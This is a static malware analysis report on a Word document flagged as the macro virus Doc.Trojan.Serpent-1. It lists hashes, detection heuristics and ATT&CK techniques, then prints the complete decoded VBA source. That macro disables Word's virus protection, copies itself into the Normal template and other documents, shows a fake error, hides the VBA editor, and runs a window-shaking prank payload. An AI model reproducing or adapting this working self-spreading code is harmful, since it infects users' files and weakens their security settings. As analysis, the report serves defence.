Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 3e15cf93ca9dad04…

MALICIOUS

Office (OLE)

30.0 KB Created: 2000-12-30 18:02:00 Authoring application: Microsoft Word 9.0 First seen: 2012-06-14
MD5: 28f43a607c9be3ffd2c0a4e9f9642f0e SHA-1: 392b272c94a46a951a1bf053e3c76f18d445ac7e SHA-256: 3e15cf93ca9dad04a86ddf11e31ee94ce4e493a774e931a8b8dd5dd10d7b89f6
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains VBA macros, including a Document_Open macro, which is a common technique for executing malicious code upon opening a document. The macro attempts to disable virus protection and manipulates the document's code. The ClamAV detection 'Doc.Trojan.Serpent-1' strongly suggests malicious intent, likely involving the execution of a payload.

Heuristics 3

  • ClamAV: Doc.Trojan.Serpent-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Serpent-1
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2366 bytes
SHA-256: d7fea8f1fe039eb2c70a704a59473ad9740e901233b830c55754a0463458dd79
Detection
ClamAV: Doc.Trojan.Serpent-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Modul1"
Private Sub Document_Open(): Dim KIOXCFG, SDFHITD, GHJIDFR, LKJWERT: Set LKJWERT = ActiveDocument.VBProject.VBComponents(1).CodeModule: Const nula = 2 * 0
With Options: .VirusProtection = nula: End With
Set KIOXCFG = ThisDocument.VBProject.VBComponents(1).CodeModule
Set SDFHITD = NormalTemplate.VBProject.VBComponents(1).CodeModule
GHJIDFR = KIOXCFG.lines(1, KIOXCFG.countoflines)
If SDFHITD.countoflines = KIOXCFG.countoflines Then
MsgBox "Error245! MSWord will try to fix the problem.", vbCritical, "MSWord - error"
End If
Dim QOINMV As New DataObject: QOINMV.SetText GHJIDFR
With SDFHITD: .deletelines 1, SDFHITD.countoflines: .insertlines 1, QOINMV.GetText
End With: With LKJWERT: .deletelines 1, LKJWERT.countoflines: .insertlines 1, QOINMV.GetText
End With
If Day(Now()) = 7 Then
Dim asd As String
For l = 1 To 4
asd = Chr(Rnd * 34 + 123) & ChrW(Rnd * 100 + 23)
asd = asd & Chr(Rnd * 200 - 10): dsa = asd & Hex(234 * Rnd) & Chr(Rnd * 5 + 55)
dfg = dsa & Hex(54) & asd & dsa: h = Asc(Chr(Rnd * 123)): x = asd & dfg & dsa & h & x
Next l
MsgBox x & dsa & asd & dfg & dsa & dfg & dfg & dsa & "---> Kad sve izgleda da umire ono se ustvari radja! <---" & dsa & dfg & asd & dfg & dfg & h & asd & dfg & x, vbExclamation, asd & " BIHnet.ORG 4nD EB Vir Labs 43v3r!!! " & asd
Application.WindowState = wdWindowStateNormal
'===={ ideja za D-Cross payload: e[ax] }===
Application.Move 150, 150
Application.Caption = "...hmmm, strange!"
For c = 1 To 300
Application.Move c, c
Application.Move -c, -c
Next c
'===={ kraj kôda za D-Cross payload }======
End If
With CommandBars: .Item("Macro").Controls("Visual Basic Editor").Enabled = False: End With: ActiveDocument.Save
'W97M.sErPeNt bY e[ax]
'D-Cross payload bY e[ax]
'Greetz: k04x, rudeboy, t[r]ax, E-Man, BIGFOOOT, SnakeLord
'Vr4g, h4dija, slash ...te ostalim pri BIHnet.org
'10x to: [moebius], KnowDeth, Jackie 2Fl0wer, Psyclone X, Mist
'mort-, Nala, LifeWire, GygaByte, ^Coke, Fulvian, VirusBuster
'...and to VicodinES (Once again God Bless tha Poppy!)
End Sub